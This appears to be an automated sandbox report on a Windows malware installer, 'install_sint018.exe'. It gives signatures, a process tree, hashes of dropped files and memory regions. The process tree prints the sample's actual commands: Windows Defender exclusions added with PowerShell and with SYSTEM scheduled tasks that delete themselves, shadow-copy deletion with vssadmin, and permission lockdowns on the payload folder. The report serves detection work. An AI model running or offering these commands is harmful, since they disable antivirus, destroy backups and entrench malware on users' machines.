Analysis

  • max time kernel
    140s
  • max time network
    153s
  • platform
    windows11-ltsc_2024_x64
  • resource
    win11ltsc2024-20260709-en
  • resource tags

    arch:x64arch:x86image:win11ltsc2024-20260709-enlocale:en-usos:windows11-ltsc_2024-x64systemwindows
  • submitted
    14/08/2026, 03:03

General

  • Target
    install_sint018.exe
  • Size 40.7MB
  • Sample260814-dj4f9seh26
  • SHA256 5d58dbe5ec12642540240e0ddd4b2689a13dbc00e4252a35748390df9ae0d00f
  • MD5 SHA1 SHA512 SSDEEP TLSH

Malware Config

Signatures

  • UAC bypass 3 TTPs 1 IoCs
  • Windows security bypass 2 TTPs 8 IoCs
  • Command and Scripting Interpreter: PowerShell 1 TTPs 1 IoCs

    Run Powershell to modify Windows Defender settings to add exclusions for file extensions, paths, and processes.

  • Executes dropped EXE 4 IoCs
  • Loads dropped DLL 4 IoCs
  • Modifies file permissions 1 TTPs 15 IoCs
  • Adds Run key to start application 2 TTPs 2 IoCs
  • Indicator Removal: Clear Persistence 1 TTPs 5 IoCs

    Clear artifacts associated with previously established persistence like scheduletasks on a host.

  • Drops file in System32 directory 1 IoCs
  • Drops file in Program Files directory 9 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • Executes a command shell one-liner 1 TTPs 24 IoCs

    Execution of a cmd.exe one-liner (/c "close" or /k "keep") is a common script/loader stage.

  • System Location Discovery: System Language Discovery 1 TTPs 2 IoCs

    Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

  • Scheduled Task/Job: Scheduled Task 1 TTPs 5 IoCs

    Schtasks is often used by malware for persistence or to perform post-infection execution.

  • Suspicious behavior: EnumeratesProcesses 64 IoCs
  • Suspicious behavior: LoadsDriver 8 IoCs
  • Suspicious use of AdjustPrivilegeToken 22 IoCs
  • Suspicious use of WriteProcessMemory 26 IoCs
  • System policy modification 1 TTPs 1 IoCs
  • Uses Task Scheduler COM API 1 TTPs

    The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.

Processes

  • C:\Users\Admin\AppData\Local\Temp\install_sint018.exe
    "C:\Users\Admin\AppData\Local\Temp\install_sint018.exe"
    1⤵
    • Suspicious behavior: EnumeratesProcesses
    PID:4296
  • C:\Windows\system32\svchost.exe
    C:\Windows\system32\svchost.exe -k GPSvcGroup
    1⤵
      PID:4416
    • C:\Users\Public\NviJXz\I9VM27.exe
      "C:\Users\Public\NviJXz\I9VM27.exe"
      1⤵
      • Executes dropped EXE
      • Loads dropped DLL
      • Adds Run key to start application
      • Drops file in System32 directory
      • Drops file in Program Files directory
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of WriteProcessMemory
      PID:6016
      • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath 'C:\ProgramData','C:\Users','C:\Program Files (x86)','C:\' -Force
        2⤵
        • Command and Scripting Interpreter: PowerShell
        • Suspicious use of AdjustPrivilegeToken
        PID:2636
      • C:\Windows\System32\cmd.exe
        "C:\Windows\System32\cmd.exe" cmd.exe /c SCHTASKS /Create /F /TN "Task1" /SC ONCE /ST 00:00 /RL HIGHEST /RU "SYSTEM" /TR "cmd.exe /c reg add \"HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\" /v \"C:\Users\Public\NviJXz\" /t REG_DWORD /d 0 /f" & SCHTASKS /Run /TN "Task1" & SCHTASKS /Delete /TN "Task1" /F
        2⤵
        • Indicator Removal: Clear Persistence
        • Suspicious use of WriteProcessMemory
        PID:4908
        • C:\Windows\system32\schtasks.exe
          SCHTASKS /Create /F /TN "Task1" /SC ONCE /ST 00:00 /RL HIGHEST /RU "SYSTEM" /TR "cmd.exe /c reg add \"HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\" /v \"C:\Users\Public\NviJXz\" /t REG_DWORD /d 0 /f"
          3⤵
          • Scheduled Task/Job: Scheduled Task
          PID:1996
        • C:\Windows\system32\schtasks.exe
          SCHTASKS /Run /TN "Task1"
          3⤵
            PID:5660
          • C:\Windows\system32\schtasks.exe
            SCHTASKS /Delete /TN "Task1" /F
            3⤵
              PID:2404
          • C:\Windows\System32\cmd.exe
            "C:\Windows\System32\cmd.exe" cmd.exe /c SCHTASKS /Create /F /TN "Task1" /SC ONCE /ST 00:00 /RL HIGHEST /RU "SYSTEM" /TR "cmd.exe /c reg add \"HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\" /v \"C:\ProgramData\" /t REG_DWORD /d 0 /f" & SCHTASKS /Run /TN "Task1" & SCHTASKS /Delete /TN "Task1" /F
            2⤵
            • Indicator Removal: Clear Persistence
            • Suspicious use of WriteProcessMemory
            PID:5076
            • C:\Windows\system32\schtasks.exe
              SCHTASKS /Create /F /TN "Task1" /SC ONCE /ST 00:00 /RL HIGHEST /RU "SYSTEM" /TR "cmd.exe /c reg add \"HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\" /v \"C:\ProgramData\" /t REG_DWORD /d 0 /f"
              3⤵
              • Scheduled Task/Job: Scheduled Task
              PID:5552
            • C:\Windows\system32\schtasks.exe
              SCHTASKS /Run /TN "Task1"
              3⤵
                PID:4752
              • C:\Windows\system32\schtasks.exe
                SCHTASKS /Delete /TN "Task1" /F
                3⤵
                  PID:3372
              • C:\Windows\System32\cmd.exe
                "C:\Windows\System32\cmd.exe" cmd.exe /c SCHTASKS /Create /F /TN "Task1" /SC ONCE /ST 00:00 /RL HIGHEST /RU "SYSTEM" /TR "cmd.exe /c reg add \"HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\" /v \"C:\Users\" /t REG_DWORD /d 0 /f" & SCHTASKS /Run /TN "Task1" & SCHTASKS /Delete /TN "Task1" /F
                2⤵
                • Indicator Removal: Clear Persistence
                • Suspicious use of WriteProcessMemory
                PID:2156
                • C:\Windows\system32\schtasks.exe
                  SCHTASKS /Create /F /TN "Task1" /SC ONCE /ST 00:00 /RL HIGHEST /RU "SYSTEM" /TR "cmd.exe /c reg add \"HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\" /v \"C:\Users\" /t REG_DWORD /d 0 /f"
                  3⤵
                  • Scheduled Task/Job: Scheduled Task
                  PID:4892
                • C:\Windows\system32\schtasks.exe
                  SCHTASKS /Run /TN "Task1"
                  3⤵
                    PID:5176
                  • C:\Windows\system32\schtasks.exe
                    SCHTASKS /Delete /TN "Task1" /F
                    3⤵
                      PID:2672
                  • C:\Windows\System32\cmd.exe
                    "C:\Windows\System32\cmd.exe" cmd.exe /c SCHTASKS /Create /F /TN "Task1" /SC ONCE /ST 00:00 /RL HIGHEST /RU "SYSTEM" /TR "cmd.exe /c reg add \"HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\" /v \"C:\Program Files (x86)\" /t REG_DWORD /d 0 /f" & SCHTASKS /Run /TN "Task1" & SCHTASKS /Delete /TN "Task1" /F
                    2⤵
                    • Indicator Removal: Clear Persistence
                    • Suspicious use of WriteProcessMemory
                    PID:4912
                    • C:\Windows\system32\schtasks.exe
                      SCHTASKS /Create /F /TN "Task1" /SC ONCE /ST 00:00 /RL HIGHEST /RU "SYSTEM" /TR "cmd.exe /c reg add \"HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\" /v \"C:\Program Files (x86)\" /t REG_DWORD /d 0 /f"
                      3⤵
                      • Scheduled Task/Job: Scheduled Task
                      PID:5496
                    • C:\Windows\system32\schtasks.exe
                      SCHTASKS /Run /TN "Task1"
                      3⤵
                        PID:5116
                      • C:\Windows\system32\schtasks.exe
                        SCHTASKS /Delete /TN "Task1" /F
                        3⤵
                          PID:3076
                      • C:\Windows\System32\cmd.exe
                        "C:\Windows\System32\cmd.exe" cmd.exe /c SCHTASKS /Create /F /TN "Task1" /SC ONCE /ST 00:00 /RL HIGHEST /RU "SYSTEM" /TR "cmd.exe /c reg add \"HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\" /v \"%USERPROFILE%\Documents\" /t REG_DWORD /d 0 /f" & SCHTASKS /Run /TN "Task1" & SCHTASKS /Delete /TN "Task1" /F
                        2⤵
                        • Indicator Removal: Clear Persistence
                        • Suspicious use of WriteProcessMemory
                        PID:3472
                        • C:\Windows\system32\schtasks.exe
                          SCHTASKS /Create /F /TN "Task1" /SC ONCE /ST 00:00 /RL HIGHEST /RU "SYSTEM" /TR "cmd.exe /c reg add \"HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\" /v \"C:\Users\Admin\Documents\" /t REG_DWORD /d 0 /f"
                          3⤵
                          • Scheduled Task/Job: Scheduled Task
                          PID:5424
                        • C:\Windows\system32\schtasks.exe
                          SCHTASKS /Run /TN "Task1"
                          3⤵
                            PID:2628
                          • C:\Windows\system32\schtasks.exe
                            SCHTASKS /Delete /TN "Task1" /F
                            3⤵
                              PID:1660
                          • C:\Program Files (x86)\y8Sn4M\y8Sn4M.exe
                            "C:\Program Files (x86)\y8Sn4M\y8Sn4M.exe"
                            2⤵
                            • UAC bypass
                            • Executes dropped EXE
                            • Loads dropped DLL
                            • Adds Run key to start application
                            • System Location Discovery: System Language Discovery
                            • System policy modification
                            PID:6008
                            • C:\Windows\SysWOW64\cmd.exe
                              cmd.exe /c vssadmin delete shadows /all /quiet
                              3⤵
                              • Executes a command shell one-liner
                              PID:1876
                            • C:\Windows\SysWOW64\cmd.exe
                              cmd.exe /c icacls "C:\Program Files (x86)\y8Sn4M" /inheritance:r
                              3⤵
                              • Executes a command shell one-liner
                              PID:4784
                              • C:\Windows\SysWOW64\icacls.exe
                                icacls "C:\Program Files (x86)\y8Sn4M" /inheritance:r
                                4⤵
                                • Modifies file permissions
                                PID:3724
                            • C:\Windows\SysWOW64\cmd.exe
                              cmd /c echo.>c:\xxxx.ini
                              3⤵
                              • Executes a command shell one-liner
                              PID:4604
                            • C:\Windows\SysWOW64\cmd.exe
                              cmd /c echo.>c:\xxxx.ini
                              3⤵
                              • Executes a command shell one-liner
                              PID:3784
                            • C:\Windows\SysWOW64\cmd.exe
                              cmd /c echo.>c:\xxxx.ini
                              3⤵
                              • Executes a command shell one-liner
                              PID:5552
                            • C:\Windows\SysWOW64\cmd.exe
                              cmd /c echo.>c:\xxxx.ini
                              3⤵
                              • Executes a command shell one-liner
                              PID:5176
                            • C:\Windows\SysWOW64\cmd.exe
                              cmd.exe /c icacls "C:\Program Files (x86)\y8Sn4M" /grant:r Administrators:(OI)(CI)F /grant:r SYSTEM:(OI)(CI)F
                              3⤵
                              • Executes a command shell one-liner
                              PID:1488
                              • C:\Windows\SysWOW64\icacls.exe
                                icacls "C:\Program Files (x86)\y8Sn4M" /grant:r Administrators:(OI)(CI)F /grant:r SYSTEM:(OI)(CI)F
                                4⤵
                                • Modifies file permissions
                                PID:3384
                            • C:\Windows\SysWOW64\cmd.exe
                              cmd.exe /c icacls "C:\Program Files (x86)\y8Sn4M" /grant:r Users:(OI)(CI)(RX) /deny Users:(OI)(CI)(DC)
                              3⤵
                              • Executes a command shell one-liner
                              PID:5616
                              • C:\Windows\SysWOW64\icacls.exe
                                icacls "C:\Program Files (x86)\y8Sn4M" /grant:r Users:(OI)(CI)(RX) /deny Users:(OI)(CI)(DC)
                                4⤵
                                • Modifies file permissions
                                PID:4640
                            • C:\Windows\SysWOW64\cmd.exe
                              cmd.exe /c icacls "C:\Program Files (x86)\y8Sn4M\y8Sn4M.exe" /inheritance:r
                              3⤵
                              • Executes a command shell one-liner
                              PID:4444
                              • C:\Windows\SysWOW64\icacls.exe
                                icacls "C:\Program Files (x86)\y8Sn4M\y8Sn4M.exe" /inheritance:r
                                4⤵
                                • Modifies file permissions
                                PID:4092
                            • C:\Windows\SysWOW64\cmd.exe
                              cmd.exe /c icacls "C:\Program Files (x86)\y8Sn4M\y8Sn4M.exe" /grant:r Administrators:(OI)(CI)F /grant:r SYSTEM:(OI)(CI)F
                              3⤵
                              • Executes a command shell one-liner
                              PID:1764
                              • C:\Windows\SysWOW64\icacls.exe
                                icacls "C:\Program Files (x86)\y8Sn4M\y8Sn4M.exe" /grant:r Administrators:(OI)(CI)F /grant:r SYSTEM:(OI)(CI)F
                                4⤵
                                • Modifies file permissions
                                PID:3076
                            • C:\Windows\SysWOW64\cmd.exe
                              cmd.exe /c icacls "C:\Program Files (x86)\y8Sn4M\y8Sn4M.exe" /grant:r Users:(RX) /deny Users:(DE)
                              3⤵
                              • Executes a command shell one-liner
                              PID:5944
                              • C:\Windows\SysWOW64\icacls.exe
                                icacls "C:\Program Files (x86)\y8Sn4M\y8Sn4M.exe" /grant:r Users:(RX) /deny Users:(DE)
                                4⤵
                                • Modifies file permissions
                                PID:5956
                            • C:\Windows\SysWOW64\cmd.exe
                              cmd.exe /c icacls "C:\Program Files (x86)\y8Sn4M\image.png" /inheritance:r
                              3⤵
                              • Executes a command shell one-liner
                              PID:3124
                              • C:\Windows\SysWOW64\icacls.exe
                                icacls "C:\Program Files (x86)\y8Sn4M\image.png" /inheritance:r
                                4⤵
                                • Modifies file permissions
                                PID:2016
                            • C:\Windows\SysWOW64\cmd.exe
                              cmd.exe /c icacls "C:\Program Files (x86)\y8Sn4M\image.png" /grant:r Administrators:(OI)(CI)F /grant:r SYSTEM:(OI)(CI)F
                              3⤵
                              • Executes a command shell one-liner
                              PID:2564
                              • C:\Windows\SysWOW64\icacls.exe
                                icacls "C:\Program Files (x86)\y8Sn4M\image.png" /grant:r Administrators:(OI)(CI)F /grant:r SYSTEM:(OI)(CI)F
                                4⤵
                                • Modifies file permissions
                                PID:4656
                            • C:\Windows\SysWOW64\cmd.exe
                              cmd.exe /c icacls "C:\Program Files (x86)\y8Sn4M\image.png" /grant:r Users:(RX) /deny Users:(DE)
                              3⤵
                              • Executes a command shell one-liner
                              PID:2852
                              • C:\Windows\SysWOW64\icacls.exe
                                icacls "C:\Program Files (x86)\y8Sn4M\image.png" /grant:r Users:(RX) /deny Users:(DE)
                                4⤵
                                • Modifies file permissions
                                PID:4896
                            • C:\Windows\SysWOW64\cmd.exe
                              cmd.exe /c icacls "C:\Program Files (x86)\y8Sn4M\thumbs.db" /inheritance:r
                              3⤵
                              • Executes a command shell one-liner
                              PID:4740
                              • C:\Windows\SysWOW64\icacls.exe
                                icacls "C:\Program Files (x86)\y8Sn4M\thumbs.db" /inheritance:r
                                4⤵
                                • Modifies file permissions
                                PID:4940
                            • C:\Windows\SysWOW64\cmd.exe
                              cmd.exe /c icacls "C:\Program Files (x86)\y8Sn4M\thumbs.db" /grant:r Administrators:(OI)(CI)F /grant:r SYSTEM:(OI)(CI)F
                              3⤵
                              • Executes a command shell one-liner
                              PID:4328
                              • C:\Windows\SysWOW64\icacls.exe
                                icacls "C:\Program Files (x86)\y8Sn4M\thumbs.db" /grant:r Administrators:(OI)(CI)F /grant:r SYSTEM:(OI)(CI)F
                                4⤵
                                • Modifies file permissions
                                PID:5020
                            • C:\Windows\SysWOW64\cmd.exe
                              cmd.exe /c icacls "C:\Program Files (x86)\y8Sn4M\thumbs.db" /grant:r Users:(RX) /deny Users:(DE)
                              3⤵
                              • Executes a command shell one-liner
                              PID:2636
                              • C:\Windows\SysWOW64\icacls.exe
                                icacls "C:\Program Files (x86)\y8Sn4M\thumbs.db" /grant:r Users:(RX) /deny Users:(DE)
                                4⤵
                                • Modifies file permissions
                                PID:2924
                            • C:\Windows\SysWOW64\cmd.exe
                              cmd.exe /c icacls "C:\Program Files (x86)\y8Sn4M\XPSPLOG.dll" /inheritance:r
                              3⤵
                              • Executes a command shell one-liner
                              PID:4584
                              • C:\Windows\SysWOW64\icacls.exe
                                icacls "C:\Program Files (x86)\y8Sn4M\XPSPLOG.dll" /inheritance:r
                                4⤵
                                • Modifies file permissions
                                PID:4196
                            • C:\Windows\SysWOW64\cmd.exe
                              cmd.exe /c icacls "C:\Program Files (x86)\y8Sn4M\XPSPLOG.dll" /grant:r Administrators:(OI)(CI)F /grant:r SYSTEM:(OI)(CI)F
                              3⤵
                              • Executes a command shell one-liner
                              PID:2148
                              • C:\Windows\SysWOW64\icacls.exe
                                icacls "C:\Program Files (x86)\y8Sn4M\XPSPLOG.dll" /grant:r Administrators:(OI)(CI)F /grant:r SYSTEM:(OI)(CI)F
                                4⤵
                                • Modifies file permissions
                                PID:4588
                            • C:\Windows\SysWOW64\cmd.exe
                              cmd.exe /c icacls "C:\Program Files (x86)\y8Sn4M\XPSPLOG.dll" /grant:r Users:(RX) /deny Users:(DE)
                              3⤵
                              • Executes a command shell one-liner
                              PID:4440
                              • C:\Windows\SysWOW64\icacls.exe
                                icacls "C:\Program Files (x86)\y8Sn4M\XPSPLOG.dll" /grant:r Users:(RX) /deny Users:(DE)
                                4⤵
                                • Modifies file permissions
                                PID:5780
                        • C:\Users\Public\NviJXz\I9VM27.exe
                          "C:\Users\Public\NviJXz\I9VM27.exe"
                          1⤵
                          • Executes dropped EXE
                          • Loads dropped DLL
                          PID:1380
                        • C:\Windows\system32\cmd.exe
                          "cmd.exe" /c reg add "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /v "C:\Users\Public\NviJXz" /t REG_DWORD /d 0 /f
                          1⤵
                          • Executes a command shell one-liner
                          • Suspicious use of WriteProcessMemory
                          PID:2684
                          • C:\Windows\System32\reg.exe
                            reg add "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /v "C:\Users\Public\NviJXz" /t REG_DWORD /d 0 /f
                            2⤵
                            • Windows security bypass
                            PID:4108
                        • C:\Windows\system32\cmd.exe
                          cmd.exe
                          1⤵
                            PID:1776
                          • C:\Windows\system32\cmd.exe
                            "cmd.exe" /c reg add "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /v "C:\Users" /t REG_DWORD /d 0 /f
                            1⤵
                            • Executes a command shell one-liner
                            • Suspicious use of WriteProcessMemory
                            PID:1280
                            • C:\Windows\System32\reg.exe
                              reg add "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /v "C:\Users" /t REG_DWORD /d 0 /f
                              2⤵
                              • Windows security bypass
                              PID:4196
                          • C:\Windows\system32\cmd.exe
                            "cmd.exe" /c reg add "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /v "C:\Program Files (x86)" /t REG_DWORD /d 0 /f
                            1⤵
                            • Executes a command shell one-liner
                            • Suspicious use of WriteProcessMemory
                            PID:2948
                            • C:\Windows\System32\reg.exe
                              reg add "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /v "C:\Program Files (x86)" /t REG_DWORD /d 0 /f
                              2⤵
                              • Windows security bypass
                              PID:5808
                          • C:\Windows\system32\cmd.exe
                            "cmd.exe" /c reg add "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /v "C:\Users\Admin\Documents" /t REG_DWORD /d 0 /f
                            1⤵
                            • Executes a command shell one-liner
                            • Suspicious use of WriteProcessMemory
                            PID:5816
                            • C:\Windows\System32\reg.exe
                              reg add "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /v "C:\Users\Admin\Documents" /t REG_DWORD /d 0 /f
                              2⤵
                              • Windows security bypass
                              PID:4116
                          • C:\Program Files (x86)\y8Sn4M\y8Sn4M.exe
                            "C:\Program Files (x86)\y8Sn4M\y8Sn4M.exe"
                            1⤵
                            • Executes dropped EXE
                            • Loads dropped DLL
                            • System Location Discovery: System Language Discovery
                            PID:1352
                          • C:\Program Files (x86)\y8Sn4M\y8Sn4M.exe
                            "C:\Program Files (x86)\y8Sn4M\y8Sn4M.exe"
                            1⤵
                              PID:3064
                            • C:\Program Files (x86)\aPDT0WW7V\Nz5booY.exe
                              "C:\Program Files (x86)\aPDT0WW7V\Nz5booY.exe"
                              1⤵
                                PID:552

                              Network

                                    MITRE ATT&CK Enterprise v16

                                    Replay Monitor

                                    Loading Replay Monitor...

                                    Downloads

                                    XPSPLOG.dll

                                    • Path C:\Program Files (x86)\aPDT0WW7V\XPSPLOG.dll
                                    • Size 4.6MB
                                    • SHA256 3328fdb5a0e5d5057f5587fb1ee23da6f44760adb184f57131cc28241debd24f
                                    • MD5 SHA1 SHA512 SSDEEP TLSH

                                    image.png

                                    • Path C:\Program Files (x86)\aPDT0WW7V\image.png
                                    • Size 5.0MB
                                    • SHA256 4d24f6e24f4ae257202c8932c5a33dc5f3659c9632b185b0c0345c493a6d4f42
                                    • MD5 SHA1 SHA512 SSDEEP TLSH

                                    XPSPLOG.dll

                                    • Path C:\Program Files (x86)\y8Sn4M\XPSPLOG.dll
                                    • Size 4.6MB
                                    • SHA256 d17963429c383f89aa2c922c14b74305fd63cb3e1d936f43025aa524d629321f
                                    • MD5 SHA1 SHA512 SSDEEP TLSH

                                    image.png

                                    • Path C:\Program Files (x86)\y8Sn4M\image.png
                                    • Size 5.0MB
                                    • SHA256 b11419bada7fd040bb3fc50f71b381ede3d48467a91f09d405762f4b7f187bb8
                                    • MD5 SHA1 SHA512 SSDEEP TLSH

                                    thumbs.db

                                    • Path C:\Program Files (x86)\y8Sn4M\thumbs.db
                                    • Size 358KB
                                    • SHA256 cde64eaf203b19c8d83f7ba8a9b1f2687dbb03c0c418adf6ed10f4c5b203cded
                                    • MD5 SHA1 SHA512 SSDEEP TLSH

                                    y8Sn4M.exe

                                    • Path C:\Program Files (x86)\y8Sn4M\y8Sn4M.exe
                                    • Size 145KB
                                    • SHA256 6d6ba2bc9ad414837826f7278bc3e0116f1aeda02d0c2284ed65819f5d9180a8
                                    • MD5 SHA1 SHA512 SSDEEP TLSH

                                    destopbak.ini

                                    • Path C:\Users\Public\Music\destopbak.ini
                                    • Size 2B
                                    • SHA256 dd1e2826c0124a6d4f7397a5a71f633928926c0608b62fb9e615ba778acc39ff
                                    • MD5 SHA1 SHA512

                                    I9VM27.exe

                                    • Path C:\Users\Public\NviJXz\I9VM27.exe
                                    • Size 135KB
                                    • SHA256 676a2a7b94ca2f8ec76352ee656e4d075bb342bd7ad6efbc7c19c060001eace7
                                    • MD5 SHA1 SHA512 SSDEEP TLSH

                                    UxEnhance64.dll

                                    • Path C:\Users\Public\NviJXz\UxEnhance64.dll
                                    • Size 3.1MB
                                    • SHA256 9bfaa49e7d596d337c5beed2247a328d9e77bf2f2729772b3f7640b2685a7577
                                    • MD5 SHA1 SHA512 SSDEEP TLSH

                                    adoresd.dat

                                    • Path C:\Users\Public\NviJXz\adoresd.dat
                                    • Size 4.7MB
                                    • SHA256 851df09e565bcf2e59fba7e48756b62df1a440547b91d14c6a5767e254ae05b4
                                    • MD5 SHA1 SHA512 SSDEEP TLSH

                                    msadox.tb

                                    • Path C:\Users\Public\NviJXz\msadox.tb
                                    • Size 8KB
                                    • SHA256 62df25abaf4aae1e09fb2674e261cdce6a47d4dc6d2ab4e033b3bf7ea0557cec
                                    • MD5 SHA1 SHA512 SSDEEP TLSH

                                    xxxx.ini

                                    • Path \??\c:\xxxx.ini
                                    • Size 2B
                                    • SHA256 7eb70257593da06f682a3ddda54a9d260d4fc514f645237f5ca74b08f8da61a6
                                    • MD5 SHA1 SHA512

                                    memory/552-775-0x0000000003420000-0x0000000003C27000-memory.dmp

                                    memory/552-774-0x0000000000C70000-0x0000000000C71000-memory.dmp

                                    memory/552-778-0x0000000000C50000-0x0000000000C51000-memory.dmp

                                    memory/552-765-0x0000000072F00000-0x000000007364A000-memory.dmp

                                    memory/552-764-0x0000000000C50000-0x0000000000C51000-memory.dmp

                                    memory/552-770-0x0000000003420000-0x0000000003C27000-memory.dmp

                                    memory/1352-743-0x00000000037E0000-0x0000000003FE7000-memory.dmp

                                    memory/1352-750-0x00000000010A0000-0x00000000010A1000-memory.dmp

                                    memory/1352-737-0x00000000037E0000-0x0000000003FE7000-memory.dmp

                                    memory/1352-726-0x00000000010A0000-0x00000000010A1000-memory.dmp

                                    memory/1352-742-0x0000000001300000-0x0000000001301000-memory.dmp

                                    memory/1352-727-0x0000000074350000-0x0000000074A9A000-memory.dmp

                                    memory/1380-582-0x0000021936EC0000-0x0000021937751000-memory.dmp

                                    memory/1380-575-0x00007FFADD6A0000-0x00007FFADDBBE000-memory.dmp

                                    memory/1380-581-0x00007FFAFEF60000-0x00007FFAFEF62000-memory.dmp

                                    memory/1380-578-0x0000021936EC0000-0x0000021937751000-memory.dmp

                                    memory/1380-586-0x0000021936EC0000-0x0000021937751000-memory.dmp

                                    memory/1380-587-0x0000021936EC0000-0x0000021937751000-memory.dmp

                                    memory/1380-588-0x0000021936EC0000-0x0000021937751000-memory.dmp

                                    memory/1380-589-0x0000021936EC0000-0x0000021937751000-memory.dmp

                                    memory/1380-590-0x00007FFAFEF50000-0x00007FFAFEF52000-memory.dmp

                                    memory/2636-610-0x000002277A620000-0x000002277A62A000-memory.dmp

                                    memory/2636-609-0x000002277A840000-0x000002277A8F2000-memory.dmp

                                    memory/2636-608-0x000002277A600000-0x000002277A61E000-memory.dmp

                                    memory/2636-602-0x000002277A590000-0x000002277A5B2000-memory.dmp

                                    memory/3064-730-0x00000000009D0000-0x00000000009D1000-memory.dmp

                                    memory/3064-747-0x00000000032C0000-0x0000000003AC7000-memory.dmp

                                    memory/3064-753-0x00000000009D0000-0x00000000009D1000-memory.dmp

                                    memory/3064-746-0x00000000009F0000-0x00000000009F1000-memory.dmp

                                    memory/3064-740-0x00000000032C0000-0x0000000003AC7000-memory.dmp

                                    memory/3064-731-0x0000000074350000-0x0000000074A9A000-memory.dmp

                                    memory/4296-0-0x0000000004880000-0x000000000488E000-memory.dmp

                                    memory/4296-1-0x0000000004880000-0x000000000488E000-memory.dmp

                                    memory/4296-2-0x0000000004890000-0x000000000489C000-memory.dmp

                                    memory/4296-504-0x00007FFAF64A0000-0x00007FFAF64B2000-memory.dmp

                                    memory/4296-526-0x0000000004880000-0x000000000488E000-memory.dmp

                                    memory/4296-527-0x00007FFAF64A0000-0x00007FFAF64B2000-memory.dmp

                                    memory/6008-686-0x00000000034F0000-0x0000000003CF7000-memory.dmp

                                    memory/6008-685-0x0000000000E70000-0x0000000000E71000-memory.dmp

                                    memory/6008-697-0x0000000003E40000-0x0000000003E54000-memory.dmp

                                    memory/6008-711-0x00000000034F0000-0x0000000003CF7000-memory.dmp

                                    memory/6008-772-0x00000000034F0000-0x0000000003CF7000-memory.dmp

                                    memory/6008-716-0x0000000010000000-0x0000000010061000-memory.dmp

                                    memory/6008-678-0x0000000000AF0000-0x0000000000AF1000-memory.dmp

                                    memory/6008-769-0x00000000034F0000-0x0000000003CF7000-memory.dmp

                                    memory/6008-690-0x00000000034F0000-0x0000000003CF7000-memory.dmp

                                    memory/6008-679-0x0000000074350000-0x0000000074A9A000-memory.dmp

                                    memory/6008-683-0x00000000034F0000-0x0000000003CF7000-memory.dmp

                                    memory/6016-548-0x000002260FB30000-0x00000226103C1000-memory.dmp

                                    memory/6016-533-0x00007FFADD6A0000-0x00007FFADDBBE000-memory.dmp

                                    memory/6016-547-0x000002260FB30000-0x00000226103C1000-memory.dmp

                                    memory/6016-568-0x000002260FB30000-0x00000226103C1000-memory.dmp

                                    memory/6016-545-0x000002260FB30000-0x00000226103C1000-memory.dmp

                                    memory/6016-541-0x000002260FB30000-0x00000226103C1000-memory.dmp

                                    memory/6016-563-0x00000226104B0000-0x000002261053A000-memory.dmp

                                    memory/6016-540-0x00007FFAFEF60000-0x00007FFAFEF62000-memory.dmp

                                    memory/6016-539-0x000002260FB30000-0x00000226103C1000-memory.dmp

                                    memory/6016-546-0x000002260FB30000-0x00000226103C1000-memory.dmp

                                    memory/6016-532-0x00007FFAFEF50000-0x00007FFAFEF52000-memory.dmp

                                    memory/6016-562-0x00000226104B0000-0x000002261053A000-memory.dmp

                                    memory/6016-552-0x000002260FB30000-0x00000226103C1000-memory.dmp

                                    memory/6016-561-0x00000226104B0000-0x000002261053A000-memory.dmp

                                    memory/6016-558-0x00000226103D0000-0x000002261041E000-memory.dmp

                                    memory/6016-560-0x00000226104B0000-0x000002261053A000-memory.dmp

                                    memory/6016-565-0x000002260FB30000-0x00000226103C1000-memory.dmp

                                    memory/6016-569-0x000002260FB30000-0x00000226103C1000-memory.dmp